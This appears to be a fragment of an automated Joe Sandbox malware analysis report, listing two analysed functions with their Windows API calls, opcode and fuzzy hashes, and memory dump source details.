                                                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2667927680-0
                                                                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                  • Instruction ID: 3770d4ac46aba918a8de271be71ff2acbe82327dde4405e81120106f7147f967
                                                                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                  • Instruction Fuzzy Hash: D921DDBAA402047BC714FBF0DC46EEA33BDAB55300F4045C87645931C1DE749AC9CB92
                                                                                  Function 00B194C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1206339513-0
                                                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                  • Instruction ID: d833bf04eb3ec8f2620056c7015c170b2818704088d0afe95670e358db5cdf62
                                                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                  • Instruction Fuzzy Hash: C101DA79540208FFCB14DFECD998EAE7BBAEF49394F108148F9099B301C635AA41DB95